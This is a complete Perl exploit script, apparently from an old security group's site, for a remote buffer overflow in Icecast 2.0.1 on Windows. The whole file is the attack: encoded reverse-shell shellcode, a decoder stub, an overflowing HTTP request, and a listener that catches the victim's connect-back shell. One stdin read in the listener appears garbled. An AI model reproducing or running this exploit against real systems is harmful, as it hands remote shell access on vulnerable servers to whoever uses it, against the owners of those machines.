#!/usr/bin/perl ################################################ # Priv8security.com remote Icecast 2.0.1 for windows exploit. # # Bug found by Luigi Auriemma # Url: http://aluigi.altervista.org/adv/iceexec-adv.txt # # This exploit give you a nice reverse shell on a host running # Icecast 2.0.1 on windows. # Older versions not tested. use IO::Socket; use Getopt::Std; getopts('h:i:l:p:', \%args); if (defined($args{'h'})) { $host = $args{'h'}; } if (defined($args{'i'})) { $yourip = $args{'i'}; } if (defined($args{'l'})) { $yourport = $args{'l'}; }else{$yourport = 6969;} if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 8000;} print STDERR "-=[Priv8security.com Icecast 2.0.1 remote exploit]=-\n\n"; if (!defined($host) || !defined($yourip)) { print STDERR "Options: -h Victim ip. -i Ip to connect back. -l Port to connect back. -p Port to attack.\n\n"; print STDERR "Usage: perl $0 -h Victim -i YOURIP\n\n"; exit; } $off_port = 161; $port_bin = reverse(pack("S", $yourport)); $off_host = 154; $host_bin = gethostbyname($yourip); $shellcoder = # win32 reverse by hdm[at]metasploit.com "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa". "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2". "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e". "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64". "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57". "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a". "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8". "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90". "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57". "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68\xc0\xa8\x00\xf7\x68\x02". "\x00\x22\x11\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44". "\x8d\x3c\x24\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe". "\x44\x24\x3d\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d". "\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00". "\x51\xff\x55\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24". "\x57\xff\x55\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b". "\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb". "\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0". "\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b". "\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b". "\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; substr($shellcoder, $off_port, 2, $port_bin); substr($shellcoder, $off_host, 4, $host_bin); $xor = 0x99; foreach my $char (split(//, $shellcoder)) #xor the shellcode to avoid nulls { $res .= chr(ord($char) ^ $xor); } $scxored = $res; $len = pack("S", 0xffff - length($scxored)); $decoder = #decoder from Metasploit.com by hdm[at]metasploit.com "\xd9\xe1". # fabs "\xd9\x34\x24". # fnstenv (%esp,1) "\x5b". # pop %ebx "\x5b". # pop %ebx "\x5b". # pop %ebx "\x5b". # pop %ebx "\x80\xeb\xe7". # sub $0xe7,%bl # # short_xor_beg: # "\x31\xc9". # xor %ecx,%ecx "\x66\x81\xe9$len". # sub $len,%cx # # short_xor_xor: # "\x80\x33\x99". # xorb $0x99,(%ebx) "\x43". # inc %ebx "\xe2\xfa"; $buffer = "\xeb\x04" . "AA: " . "\x90" x 10 . $decoder . $scxored . "\r\n"; $crap = "AAAA: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n"; $pacote = "GET / HTTP/1.0\r\nHost: Priv8security.com\r\n"; $pacote .= $crap x 30 . $buffer . "\r\n"; $b = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port) or die "Cant connect: $!\n"; Listenshell($yourport); print STDERR "[+] Sending our stuff... "; $b->send($pacote); print STDERR "DOne!\n"; print STDERR "[+] Now wait for connectback shell...\n"; sub Listenshell { my ($lport) = @_; my $lsock = IO::Socket::INET->new(Proto=>"tcp",LocalPort=>$lport,Type=>SOCK_STREAM,Listen=>3,ReuseAddr=>1) or die "[-] Error starting listener: $!\n"; print "[+] Listener started on port $lport\n"; die "cant fork: $!" unless defined($listen_pid = fork()); if ($listen_pid) { my $cback; while ($cback = $lsock->accept()){ print STDOUT "[+] Starting Shell " . $cback->peerhost . ":" . $cback->peerport . "\n\n"; print $cback "\n"; die "cant fork: $!" unless defined($pid = fork()); if ($pid) { while(defined ($line = <$cback>)) { print STDOUT $line; } kill("TERM", $pid); } else { while(defined ($line = )) { print $cback $line; } } } } }